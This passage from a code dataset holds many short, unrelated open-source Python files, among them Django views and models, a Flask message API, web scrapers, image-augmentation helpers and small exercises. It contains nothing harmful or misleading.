self.showDialogBox(e)\ndef start_upscale(self,AI): # command linked directly to upscale buttons \n try: \n if self.input_file != '':\n self.render='esrgan'\n has_enough_space,predicted_space,total_space = checks.check_if_enough_space(self.input_file,self.render,self.times)\n \n if has_enough_space:\n initializeUpscale(self,AI)\n elif not_enough_storage(self,predicted_space,total_space):\n initializeUpscale(self,AI)\n else:\n pass\n \n else:\n no_input_file(self)\n \n except Exception as e:\n traceback_info = traceback.format_exc()\n log(f'ERROR: {e} {traceback_info}')\n self.showDialogBox(e)\n ","repo_name":"TNTwise/REAL-Video-Enhancer","sub_path":"modules/upscale.py","file_name":"upscale.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"42945934778","text":"############################################\n# singleton_basic_3.py\n# 根据书上的java代码改写\n############################################\n\nclass Singleton(object):\n\t__uniqueInstance = None\n\n\tdef __create(cls, *args, **kwargs):\n\t\treturn object.__new__(cls, *args, **kwargs)\n\n\t@classmethod\n\tdef getInstance(cls, *args, **kwargs):\n\t\tif cls.__uniqueInstance is None:\n\t\t\tcls.__uniqueInstance = cls.__create(cls, *args, **kwargs)\n\t\treturn cls.__uniqueInstance\n\n\nif __name__ == '__main__':\n\ta = Singleton.getInstance()\n\tb = Singleton.getInstance()\n\tprint(id(a),id(b))\n\tassert id(a) == id(b)","repo_name":"weiwang-linda/design_pattern","sub_path":"singleton_chapter5/singleton_basic_3.py","file_name":"singleton_basic_3.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15535717097","text":"import json\nfrom models import Authors, Quotes\n\nwith open(\"quotes.json\", \"r\", encoding='utf-8') as f:\n q_data = json.load(f)\n\n\nfor item in q_data:\n a_name = item[\"author\"]\n q_author = Authors.objects(fullname=a_name).first()\n quote = Quotes(\n tags=item[\"tags\"],\n author=q_author,\n quote=item[\"quote\"]\n )\n quote.save()","repo_name":"Dmytro-Kruhlov/goit-hw-8","sub_path":"add_quotes.py","file_name":"add_quotes.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39547800347","text":"from .orm import start_mappers\n\nfrom sqlalchemy.ext.asyncio import create_async_engine, AsyncSession\nfrom sqlalchemy.orm import sessionmaker\n\n\nclass DatabaseManager():\n \"\"\"Class for database management.\"\"\"\n\n def __init__(self, url: str) -> None:\n start_mappers()\n\n self.engine = create_async_engine(url)\n\n base_session_factory = sessionmaker(\n bind=self.engine,\n class_=AsyncSession,\n )\n\n self.session: AsyncSession = base_session_factory()\n\n async def close(self) -> None:\n await self.session.close()\n","repo_name":"LEv145/DiscordMusicBot","sub_path":"src/music_bot/database/database_manager.py","file_name":"database_manager.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30762569593","text":"from typing import Any, Dict\nfrom nicegui import ui\nimport uuid\n\n\nclass Setting_object():\n def __init__(self,headers,data = None):\n self.headers = headers\n print(\"new object \",data)\n self._data = data\n pass\n def update(self,data):\n print(\"update\",data)\n return\n def to_card(self,headers):\n print(\"to_card\",headers)\n itr = iter(self._data)\n for h in headers:\n ui.label(h.get_name())\n ui.label(next(itr))\n\n def load_edit(self,edit_items):\n itr = iter(self._data)\n for h in self.headers:\n print(h)\n edit_items[h.id].value=next(itr)\n return\n\n def __str__(self):\n o1 = []\n itr = iter(self._data)\n for h in self.headers:\n print(h)\n o1.append(\"%s : %s\"%(h.get_name(),next(itr)))\n return \"[%s]\"%\",\".join(o1)\nclass Setting_Header():\n def __init__(self,name,description):\n print(name,description)\n self._name = name\n self._desc = description\n self.id = uuid.uuid4().hex\n def to_edit_primary_key(self):\n i = ui.input()\n i.set_visibility(False)\n return i\n def to_edit_string(self):\n return ui.input(self._name)\n def to_edit_enum(self):\n s1 = ui.select(self._desc[\"values\"])\n return s1\n def to_edit_number(self):\n return ui.number(self._name)\n def get_name(self):\n return self._name\n\n def to_edit_item(self):\n tmp_name = \"to_edit_\"+self._desc[\"type\"]\n if hasattr(self,tmp_name):\n return getattr(self,tmp_name)()\n\n return ui.label(f\"?{tmp_name}\")\nclass Setting_Model_Descriptor():\n def __init__(self,name,headers):\n self.name = name\n self.headers = headers\n self.lists = []\n return\n def get_objects(self):\n print(\"get_objects\")\n return self.lists\n def get_headers(self):\n print(\"get_headers\")\n return self.headers\n def create(self,data):\n print(\"create\",data)\n new_data = []\n for h in self.headers:\n print(h,h.id,data[h.id])\n new_data.append(data[h.id].value)\n new_obj = Setting_object(self.get_headers(),new_data)\n self.lists.append(new_obj)\n return new_obj\n\n def remove(self,obj):\n self.lists.remove(obj)\n def set_new(self,edit_items):\n for h in self.headers:\n edit_items[h.id].value= None\ndef model_factory(model):\n headers = []\n for h in model[\"items\"]:\n print(h,model[\"items\"][h])\n headers .append(Setting_Header(h,model[\"items\"][h]))\n return Setting_Model_Descriptor(model[\"model_name\"],headers)\n\n\ndef ui_factory(objects):\n ui.label(\"this page is for setting\")\n factory_name = objects.name\n dialog_object = {\"value\":{},\"object\":None}\n\n def create() -> None:\n open_dialog(None)\n display_list.refresh()\n\n ui.button(f'Add new {factory_name}', on_click=create)\n\n @ui.refreshable\n def display_list():\n for obj in objects.get_objects():\n print(obj)\n with ui.card():\n with ui.row().classes('justify-between w-full'):\n obj.to_card(objects.get_headers())\n with ui.row():\n ui.button('edit', on_click=lambda _, obj=obj: open_dialog(obj))\n ui.button('delete', on_click=lambda _, obj=obj: delete(obj), color='red')\n display_list()\n def update() -> None:\n # max_id = objects[0][0] if len(objects) > 0 else 0\n # print(\"H\",objects,dialog_object[\"value\"])\n # dialog_id = dialog_object[\"value\"][\"id\"]\n # for itm in objects:\n # print(\"V\",itm)\n # if itm[0] > max_id:\n # max_id = itm[0]\n # if itm[0] == dialog_id:\n # itm[1] = dialog_object[\"value\"][\"name\"].value\n # itm[2] = dialog_object[\"value\"][\"age\"].value\n if dialog_object[\"object\"] is None:\n new_obj = objects.create(dialog_object[\"value\"])\n ui.notify(f'Create new {factory_name} {new_obj}')\n else:\n dialog_object[\"object\"].update(dialog_object[\"value\"])\n ui.notify(f'Updated {factory_name} {dialog_object[\"object\"]}')\n dialog.close()\n display_list.refresh()\n\n with ui.dialog() as dialog:\n with ui.card():\n for obj_desc in objects.get_headers():\n dialog_object[\"value\"][obj_desc.id]=obj_desc.to_edit_item()\n # dialog_object[\"value\"][\"id\"] = None\n # dialog_object[\"value\"][\"name\"] = ui.input('Name')\n # dialog_object[\"value\"][\"age\"] = ui.number('Age', format='%.0f')\n # dialog_name = ui.input('Name')\n # dialog_age = ui.number('Age', format='%.0f')\n with ui.row():\n ui.button('Save', on_click=update)\n ui.button('Close', on_click=dialog.close).props('outline')\n\n\n def delete(obj: Dict[str, Any]) -> None:\n objects.remove(obj)\n ui.notify(f'Deleted {factory_name} {obj}')\n display_list.refresh()\n\n def open_dialog(obj: Dict[str, Any]) -> None:\n print(obj)\n dialog_object[\"object\"]=obj\n if obj:\n obj.load_edit(dialog_object[\"value\"])\n else:\n objects.set_new(dialog_object[\"value\"])\n dialog.open()\n\n return\n\n\n\n\n\n","repo_name":"Bamdad-rar/NiceguiSimpleAdminPanel","sub_path":"sections/setting/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5406,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"72095857448","text":"from unicodedata import name\nimport uuid\nfrom django.db import models\nfrom user_manager.models import User\n\n\n\n\nclass Product(models.Model):\n id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\n name = models.CharField(max_length=255,)\n code = models.CharField(max_length=255,)\n quantity = models.IntegerField()\n reorder_min = models.IntegerField()\n status = models.CharField(max_length=255, default=\"INSTOCK\")\n added_by = models.ForeignKey(\n User, on_delete=models.CASCADE, related_name=\"added_by\"\n )\n date_created = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n db_table = \"products\"\n\n def __str__(self):\n return str(self.name)\n \nclass Reorder(models.Model):\n id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\n product = models.ForeignKey(\n Product, on_delete=models.CASCADE, related_name=\"product_reordered\"\n )\n status = models.CharField(max_length=255, default=\"PENDING\")\n cleared_by = models.ForeignKey(\n User, on_delete=models.CASCADE, related_name=\"cleared_by\",\n null=True, blank=True\n )\n date_cleared = models.DateTimeField(null=True, blank=True)\n date_created = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n db_table = \"reordered\"\n\n def __str__(self):\n return str(self.product.name)\n","repo_name":"arllence/value8-backend","sub_path":"core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5463073900","text":"import random\nimport os\nimport glob\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport cv2\nfrom perlin_generator import PerlinGenerator\n\n\ndef get_image_lists():\n walk_dir = os.path.join(os.getcwd(), 'pap-smear2005')\n file_list = list(glob.iglob(walk_dir + '**/**/*.BMP', recursive=True))\n\n normal_cells = []\n abnormal_cells = []\n\n for filename in file_list:\n if 'normal' in filename:\n normal_cells.append(filename)\n else:\n abnormal_cells.append(filename)\n return normal_cells, abnormal_cells\n\n\ndef load_image(filename):\n image = cv2.imread(filename)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n return image\n\n\ndef shuffle_dataset(X, y, masks=None):\n if masks is None:\n dataset = list(zip(X, y))\n random.shuffle(dataset)\n shuffled_X, shuffled_y = zip(*dataset)\n return list(shuffled_X), list(shuffled_y)\n else:\n dataset = list(zip(X, y, masks))\n random.shuffle(dataset)\n shuffled_X, shuffled_y, shuffled_m = zip(*dataset)\n return list(shuffled_X), list(shuffled_y), list(shuffled_m)\n\n\ndef get_smear_set(with_labels=False):\n normal_cells, abnormal_cells = get_image_lists()\n images = []\n labels = []\n print(\"Healhy cell images: \", len(normal_cells))\n print(\"Unhealhy cell images: \", len(abnormal_cells))\n if not with_labels:\n for filename in normal_cells:\n images.append(load_image(filename))\n labels.append(0)\n\n for filename in abnormal_cells:\n images.append(load_image(filename))\n labels.append(1)\n else:\n for filename in normal_cells + abnormal_cells:\n images.append(load_image(filename))\n labels.append(filename.split('/')[-2])\n labels = np.array(labels).reshape(-1, 1)\n return images, labels # , onehot_encoder.categories_\n\n\ndef augmentation_by_copy(X, y, amount=500):\n if amount > len(X):\n amount = len(X) - 1\n X_copy, y_copy = shuffle_dataset(X, y, None)\n\n X_aug = X + X_copy[:amount]\n y_aug = y + y_copy[:amount]\n return X_aug, y_aug\n\n\ndef augmentation_by_perlin(X, y, masks, amount=500):\n if amount > len(X):\n amount = len(X) - 1\n pg = PerlinGenerator(X, y, masks)\n X_aug, y_aug = pg.get_augmented_set(amount)\n return X_aug, y_aug\n\n\ndef get_mask_set():\n normal_file_cells, abnormal_cells = get_image_lists()\n images = []\n for filename in normal_file_cells:\n images.append(load_image(filename[:-4] + '-d.bmp'))\n for filename in abnormal_cells:\n images.append(load_image(filename[:-4] + '-d.bmp'))\n images = np.array(images)\n return images\n\n\nif __name__ == '__main__':\n images, labels = get_smear_set()\n masks = get_mask_set()\n ax1 = plt.subplot(211)\n # ax1.imshow(add_perlin_noise(images[0], masks[0]))\n ax2 = plt.subplot(212)\n ax2.imshow(images[0])\n plt.show()\n\n X_full, y_full, categories = get_smear_set()\n X_aug, y_aug = augmentation_by_copy(X_full, y_full, 500)\n print(\"Size of augmented image set: \", len(X_aug))\n print(\"Size of augmented label set: \", len(y_aug))\n","repo_name":"brykam/wit_augmentation","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26941384284","text":"bird_words = 'hoooowe yyyooouuu duoooiiine'\r\n#bird_words = 'hieeelalaooo'\r\n#bird_words = 'aaa bo cy da eee fe'\r\n\r\ndef translate(phrase: str) -> str:\r\n result = ''\r\n vowels = \"aeiouy\"\r\n\r\n i = 0\r\n while i < len(phrase):\r\n result += phrase[i]\r\n print(\"input: [\"+phrase[i]+\"], i=\"+str(i))\r\n if phrase[i].isspace():\r\n print(\"found space, keep it\")\r\n i += 1\r\n elif vowels.count(phrase[i]) > 0:\r\n i += 3\r\n else:\r\n i += 2\r\n return result\r\n\r\nprint(translate(bird_words))","repo_name":"mititer/python-study","sub_path":"checkio8.py","file_name":"checkio8.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"895975828","text":"from flask import Flask, redirect, request, url_for, render_template\nimport json\n\n# config\n# server will reload on source changes, and provide a debugger for errors\nDEBUG = True\n\napp = Flask(__name__)\napp.config.from_object(__name__) # consume the configuration above\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\nmessage_list = []\n\n# This url handles both GET and POST, with different functionality\n@app.route('/messages', methods=['GET', 'POST'])\ndef messages():\n if request.method == 'GET':\n return json.dumps(message_list) # Convert message_list to a json string\n if request.method == 'POST':\n # request.data contains the json data from client\n msg = json.loads(request.data) # Convert the json string to a python dict\n message_list.append(msg)\n return json.dumps({\"status_message\": \"ok-created\"}) # Return something\n\n\nif __name__ == \"__main__\":\n app.run()","repo_name":"hack101/lesson5","sub_path":"flask-package/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11995499552","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom soupselect import select\nimport csv\n\nwith open('data/import/episodes.csv', 'r') as episodes:\n reader = csv.reader(episodes, delimiter=',')\n reader.next()\n\n with open('data/import/characters.csv', 'w') as characters:\n writer = csv.writer(characters, delimiter=',')\n writer.writerow([\"EpisodeId\", \"Character\", \"Actor\"])\n\n for row in reader:\n filename = \"imdb/S%s-Ep%s-fullcredits\" %(int(row[3]), int(row[1]))\n # print filename\n characters_page = open(filename, 'r').read()\n soup = BeautifulSoup(characters_page)\n characters = select(soup, 'table.cast_list tr')\n\n for character_row in characters:\n columns = select(character_row, \"td\")\n if len(columns) > 1:\n # print select(select(character_row, \"td.character\")[0], \"a\")\n character = \" \".join(select(character_row, \"td.character\")[0].text.replace(\"\\n\", \"\").split()).encode(\"utf-8\")\n actor = \" \".join(select(character_row, \"td.itemprop\")[0].text.replace(\"\\n\", \"\").split()).encode(\"utf-8\")\n\n characters = character.split(\" / \")\n\n for c in characters:\n c = c.replace(\"(credit only)\", \"\").replace(\"(uncredited)\",\"\").strip()\n\n if c in [\"Himself\", \"Herself\", \"Himself (voice)\", \"Himself - Boyz II Men\"]:\n c = actor\n\n writer.writerow([row[0], c, actor])\n","repo_name":"mneedham/neo4j-himym","sub_path":"scripts/scrape_characters.py","file_name":"scrape_characters.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"53"} +{"seq_id":"40907444600","text":"\"\"\"\nThis file demonstrates two different styles of tests (one doctest and one\nunittest). These will both pass when you run \"manage.py test\".\n\nReplace these with more appropriate tests for your application.\n\"\"\"\n\nfrom django.test import TestCase\n\nfrom resources.models import TextResource\nfrom django.contrib import auth\n\n\n\nclass SimpleTest(TestCase):\n def test_basic_TextResource(self):\n \"\"\"\n Creates a TextResource and checks if it has the right text\n \"\"\"\n dummy = auth.models.User(username=\"john\")\n dummy.save()\n\n s = \"alskj aslkj \"\n t = TextResource(text=s, owner=dummy)\n t.save()\n\n self.failUnlessEqual(t.text, s)\n self.failUnlessEqual(t.owner.id, dummy.id)\n\n","repo_name":"kronoschool/kronos","sub_path":"kronos_proj/resources/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"5589135373","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\n#Ex1\nspace = pd.read_csv(\"space.csv\", delimiter=\";\")\nspace_ = space['Company Name'].where(space['Location'].str.contains('USA')).unique()\nspace__ = space['Company Name'].where(space['Location'].str.contains('China')).unique()\n\nspace_eua = len(space_)\nspace_china = len(space__)\n\nplt.title('Viagens Espaciais')\nplt.xlabel('Países') #Legenda no eixo X\nplt.ylabel('Nº de Viagens') #Legenda no eixo Y\n\nplt.bar('China', space_china, align='center', alpha=0.5)\nplt.bar('EUA', space_eua, align='center', alpha=0.5)\n\nplt.show()\n\n\n#Ex2\npaises = pd.read_csv('paises.csv',delimiter=\";\")\npaises_ = paises[paises['Region'].str.contains(\"NORTHERN AMERICA\")]\n\nplt.xlabel('Países') #Legenda no eixo X\nplt.ylabel('Natalidade e Mortalidade') #Legenda no eixo Y\nplt.title('Taxa de Natalidade e Mortalidade na America do Norte')\nplt.plot(paises_['Country'], paises_['Birthrate'], 'o:r', paises_['Country'], paises_['Deathrate'], '*:b' )\n\nplt.show()\n\n","repo_name":"IASR19/C111","sub_path":"ExCap6_C111_Itamar_GES.py","file_name":"ExCap6_C111_Itamar_GES.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7945812047","text":"from typing import List\nimport logging\n\nfrom django.conf import settings\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.mixins import PermissionRequiredMixin\nfrom django.contrib import messages\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.core.exceptions import PermissionDenied\nfrom django.shortcuts import redirect\nfrom django.urls import reverse_lazy\nfrom django.urls import reverse\nfrom django.utils import translation\nfrom django.utils.translation import gettext as _\nfrom django.views.generic import CreateView\nfrom django.views.generic import DetailView\nfrom django.views.generic import UpdateView\n\nfrom base import mixins\nfrom base import utils\nfrom keycloakauth.utils import update_user_groups\nfrom . import forms\nfrom . import models\nfrom .rules import has_profile\n\nlogger = logging.getLogger(__name__)\n\n\ndef activate_language(language_code, request):\n logger.debug(\"activate_language called\")\n translation.activate(language_code)\n request.session[translation.LANGUAGE_SESSION_KEY] = language_code\n\n\nclass UserProfileMixin(object):\n\n def get_object(self, queryset=None):\n user = self.request.user\n return user.profile if has_profile(user) else False\n\n\nclass PrivilegedUserProfileCreateView(LoginRequiredMixin,\n PermissionRequiredMixin,\n UserProfileMixin,\n mixins.FormUpdatedMessageMixin,\n CreateView):\n model = models.PrivilegedUserProfile\n template_name_suffix = \"_create\"\n success_url = settings.LOGOUT_URL\n permission_required = \"profiles.can_create_profile\"\n fields = ()\n admin_email_subject_template_name = (\n \"profiles/mail/privilegeduser_registration_request_subject.txt\")\n admin_email_message_template_name = (\n \"profiles/mail/privilegeduser_registration_request_message.txt\")\n\n @property\n def success_message(self):\n return _(\"Privileged user profile created!\")\n\n def get_login_url(self):\n if not self.request.user.is_authenticated:\n return settings.LOGIN_URL\n elif has_profile(self.request.user):\n raise PermissionDenied(\"User already has a profile\")\n\n def get_context_data(self, **kwargs):\n context_data = super().get_context_data(**kwargs)\n context_data[\"user_form\"] = self._get_user_form()\n return context_data\n\n def form_valid(self, form):\n \"\"\"Assign the request's user to the form and perform profile moderation\n\n This method relies on the presence of a ``groups`` key on the id token.\n\n \"\"\"\n\n form.instance.user = self.request.user\n user_form = self._get_user_form()\n if user_form.is_valid():\n user = user_form.save()\n activate_language(user.language_preference, self.request)\n super().form_valid(form)\n id_token = self.request.session.get(\"id_token\")\n try:\n update_user_groups(\n user=self.request.user,\n user_profile=settings.PRIVILEGED_USER_PROFILE,\n current_keycloak_groups=id_token.get(\"groups\", [])\n )\n result = redirect(\"home\")\n except RuntimeError:\n messages.info(\n self.request, _(\"Registration request sent to admins\"))\n messages.info(self.request, _(\"You have been logged out\"))\n utils.send_email_to_admins(\n self.admin_email_subject_template_name,\n self.admin_email_message_template_name,\n context={\n \"username\": self.request.user.username,\n \"email\": self.request.user.email,\n \"keycloak_base_url\": settings.KEYCLOAK[\"base_url\"],\n \"site_name\": get_current_site(self.request),\n }\n )\n result = redirect(settings.LOGOUT_URL)\n else:\n result = self.form_invalid(form)\n return result\n\n def form_invalid(self, form):\n user_form = self._get_user_form()\n return self.render_to_response(\n self.get_context_data(form=form, user_form=user_form))\n\n def _get_user_form(self):\n data = self.request.POST if self.request.method == \"POST\" else None\n return forms.SmbUserForm(data=data, instance=self.request.user)\n\n\nclass EndUserProfileCreateView(LoginRequiredMixin,\n PermissionRequiredMixin,\n UserProfileMixin,\n mixins.FormUpdatedMessageMixin,\n CreateView):\n \"\"\"Profile completion view\n\n This view uses two forms, one for the completion of the user profile and\n another for the mobility habits survey.\n\n \"\"\"\n\n model = models.EndUserProfile\n form_class = forms.EndUserProfileForm\n template_name_suffix = \"_create\"\n permission_required = \"profiles.can_create_profile\"\n success_url = reverse_lazy(\"bikes:list\")\n\n @property\n def goto(self):\n return \"bikes:list\"\n\n @property\n def success_message(self):\n return _(\"User profile created. You can now add some bikes\")\n\n def get_login_url(self):\n if not self.request.user.is_authenticated:\n return settings.LOGIN_URL\n elif has_profile(self.request.user):\n raise PermissionDenied(\"User already has a profile\")\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context.update(self._get_extra_forms())\n return context\n\n def form_valid(self, form):\n \"\"\"Assign the request's user to the form and perform profile moderation\n\n This method relies on the presence of a ``groups`` key on the id token.\n This key is used in order to sync group memberships with keycloak.\n\n \"\"\"\n\n form.instance.user = self.request.user\n # validate extra forms before saving anything\n extra_forms = self._get_extra_forms()\n if all([f.is_valid() for f in extra_forms.values()]):\n super().form_valid(form)\n # upon calling super().form_valid(form) the property self.object\n # points to the newly created enduser profile\n mobility_form = extra_forms[\"mobility_form\"]\n mobility_form.instance.end_user = self.object\n mobility_form.save()\n user_form = extra_forms[\"user_form\"]\n user = user_form.save()\n activate_language(user.language_preference, self.request)\n response = redirect(self.get_success_url())\n id_token = self.request.session.get(\"id_token\")\n update_user_groups(\n user=self.request.user,\n user_profile=settings.END_USER_PROFILE,\n current_keycloak_groups=id_token.get(\"groups\", [])\n )\n else:\n response = self.form_invalid(form)\n logger.debug(\"response: {}\".format(response))\n return response\n\n def form_invalid(self, form):\n extra_forms = self._get_extra_forms()\n return self.render_to_response(\n self.get_context_data(form=form, **extra_forms))\n\n def _get_extra_forms(self):\n data = self.request.POST if self.request.method == \"POST\" else None\n return {\n \"user_form\": forms.SmbUserForm(data=data,\n instance=self.request.user),\n \"mobility_form\": forms.UserMobilityHabitsForm(data=data)\n }\n\n\nclass ProfileUpdateView(LoginRequiredMixin,\n PermissionRequiredMixin,\n mixins.UserHasObjectPermissionMixin,\n UserProfileMixin,\n mixins.FormUpdatedMessageMixin,\n UpdateView):\n permission_required = \"profiles.can_edit_profile\"\n\n @property\n def success_message(self):\n return _(\"User profile updated!\")\n\n\n def has_permission(self):\n user = self.request.user\n for perm in self.get_permission_required():\n if not user.has_perm(perm, obj=user.profile):\n result = False\n break\n else:\n result = True\n return result\n\n def get_template_names(self):\n profile_class = type(self.request.user.profile)\n template_name = {\n models.EndUserProfile: \"profiles/enduserprofile_update.html\",\n models.PrivilegedUserProfile: (\n \"profiles/privilegeduserprofile_update.html\"),\n }.get(profile_class)\n return [template_name]\n\n def get_queryset(self):\n profile_class = type(self.request.user.profile)\n return profile_class.objects.get(pk=self.request.user.profile.pk)\n\n def get_form_class(self):\n profile_class = type(self.request.user.profile)\n return {\n models.EndUserProfile: forms.EndUserProfileForm,\n models.PrivilegedUserProfile: forms.PrivilegedUserProfileForm,\n }.get(profile_class)\n\n def get_context_data(self, **kwargs):\n context_data = super().get_context_data(**kwargs)\n context_data[\"user_form\"] = self._get_user_form()\n return context_data\n\n def get_login_url(self):\n if not self.request.user.is_authenticated:\n result = settings.LOGIN_URL\n else:\n messages.info(\n self.request,\n _(\"Please complete your user profile before continuing\")\n )\n result = reverse(\"profile:create\")\n return result\n\n def form_valid(self, form):\n \"\"\"Process uploaded form data after the form has been validated\n\n Reimplemented in order to also perform validation on the other form,\n for the SmbUser model, and handle all uploaded data.\n\n \"\"\"\n\n form.instance.user = self.request.user\n user_form = self._get_user_form()\n if user_form.is_valid():\n user = user_form.save()\n activate_language(user.language_preference, self.request)\n response = super().form_valid(form)\n else:\n response = self.form_invalid(form)\n return response\n\n def form_invalid(self, form):\n user_form = self._get_user_form()\n return self.render_to_response(\n self.get_context_data(form=form, user_form=user_form))\n\n def _get_user_form(self):\n data = self.request.POST if self.request.method == \"POST\" else None\n return forms.SmbUserForm(\n data=data,\n instance=self.request.user,\n include_accept_terms_field=False\n )\n\n\nclass MobilityHabitsSurveyCreateView(LoginRequiredMixin,\n PermissionRequiredMixin,\n UserProfileMixin,\n mixins.FormUpdatedMessageMixin,\n CreateView):\n model = models.MobilityHabitsSurvey\n context_object_name = \"survey\"\n form_class = forms.UserMobilityHabitsForm\n template_name_suffix = \"_create\"\n success_url = reverse_lazy(\"profile:update\")\n permission_required = \"profiles.can_edit_profile\"\n\n def has_permission(self):\n user = self.request.user\n for perm in self.get_permission_required():\n if not user.has_perm(perm, obj=user.profile):\n result = False\n break\n else:\n result = True\n return result\n\n def get_login_url(self):\n if not self.request.user.is_authenticated:\n return settings.LOGIN_URL\n else:\n raise PermissionDenied()\n\n def form_valid(self, form):\n form.instance.end_user = self.request.user.profile\n return super().form_valid(form)\n\n\nclass MobilityHabitsSurveyDetailView(LoginRequiredMixin,\n PermissionRequiredMixin,\n mixins.AjaxTemplateMixin,\n DetailView):\n model = models.MobilityHabitsSurvey\n context_object_name = \"survey\"\n permission_required = \"profiles.can_view_profile\"\n ajax_template_name = \"profiles/mobilityhabitssurvey_detail_inner.html\"\n","repo_name":"geosolutions-it/smb-portal","sub_path":"smbportal/profiles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12376,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31946586534","text":"from typing import List, Tuple\nfrom pygame import camera, image\nfrom time import sleep\nfrom PIL import BmpImagePlugin\n\ndef getCamera(cam: str, size: Tuple):\n camera.init()\n cam = camera.Camera(cam, size)\n cam.start()\n sleep(1)\n return cam\n\ndef split(arr: List, x: int) -> List:\n res = []\n last = 0\n for [k, i] in enumerate(arr):\n if k - last + 1 == x:\n res.append(arr[last:k+1])\n last = k + 1\n return res\n\ndef flatten(item) -> List:\n res = []\n if isinstance(item, List):\n for i in item:\n res += flatten(i)\n else:\n res.append(item)\n return res\n\ndef coordInBox(coord: Tuple[int, int], box: Tuple[int, int, int, int]) -> bool:\n x, y = coord\n l, t, r, b = box\n return y >= t and y <= b and x >= l and x <= r\n\ndef fillWithBlank(file:str, box: Tuple, dest: str, fill: Tuple = (0, 0, 200), negative=False):\n img = BmpImagePlugin.BmpImageFile(file)\n flat = bytearray(img.tobytes())\n pixels_flat = split(list(flat), 3) # concat rgb channels (3b) into one pixel\n pixels_2d = split(pixels_flat, img.size[0]) # concat pixels into height => width\n\n for [k_h, h] in enumerate(pixels_2d):\n for [k_w, pixel] in enumerate(h):\n # if k_h >= t and k_h <= b and k_w >= l and k_w <= r:\n if coordInBox((k_w, k_h), box) == (not(negative)):\n pixels_2d[k_h][k_w] = list(fill)\n edited_flat = flatten(pixels_2d)\n result = img.copy()\n result.frombytes(bytes(edited_flat))\n result.save(dest)\n\ndef savePicture(cam: str, size: Tuple, saveFile: str) -> None:\n img = getCamera(cam, size).get_image()\n image.save(img, saveFile, \"bmp\")\n\nif __name__ == '__main__':\n # savePicture(\"FHD Webcam\", (512, 384), \"../../real_images/25.bmp\")\n # savePicture(\"FHD Webcam\", (512, 384), saveFile=\"../../real_images/30.bmp\")\n fillWithBlank(\"../../real_images/30.bmp\", (60, 96, 255, 209), \"../../real_images/31.bmp\", (255, 255, 255), negative=True)\n\n # fillWithBlank(\"../../real_images/20.bmp\", (0, 0, 50, 50), \"../../real_images/x.bmp\", fill=(90, 250, 2), negative=True)\n pass\n# a = [1, 2, 3, 4, 5, 6, 7, 8,9]\n# b = split(a, 3)\n# print(b)\n","repo_name":"finnstamer/trash-recognition","sub_path":"interface/camera/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10448886636","text":"\nimport requests\nfrom bs4 import BeautifulSoup\n\nclass HttpQuery:\n\n def __init__(self, url):\n self.url = url\n self.r = requests.get(self.url)\n\n def get_html_page(self):\n \n if self.r.status_code == 200:\n print('status code :', self.r.status_code)\n return self.r.text\n else:\n print(r.status_code)\n\nclass ElementPage:\n\n def __init__(self, html):\n self.html = html\n self.soup = BeautifulSoup(self.html, 'lxml')\n\n def parent_page_element(self):\n\n abc = self.soup.find('div', class_='body').find_all('div', class_='section')\n res_text = []\n for row in abc:\n if row != '':\n div_p = row.find_all('p')\n for row in div_p:\n try:\n text_p = row.text\n except:\n text_p != ''\n if text_p != '':\n res_text.append(text_p)\n return res_text\n","repo_name":"hitruk/pop_eng","sub_path":"page_obj/parent_page.py","file_name":"parent_page.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24678682707","text":"from peewee import Model, SqliteDatabase, CharField, DateField, BooleanField\nfrom datetime import date, datetime\nimport datetime as dt\n\n\ndb = SqliteDatabase('roadtax_date.db')\n\n\nclass 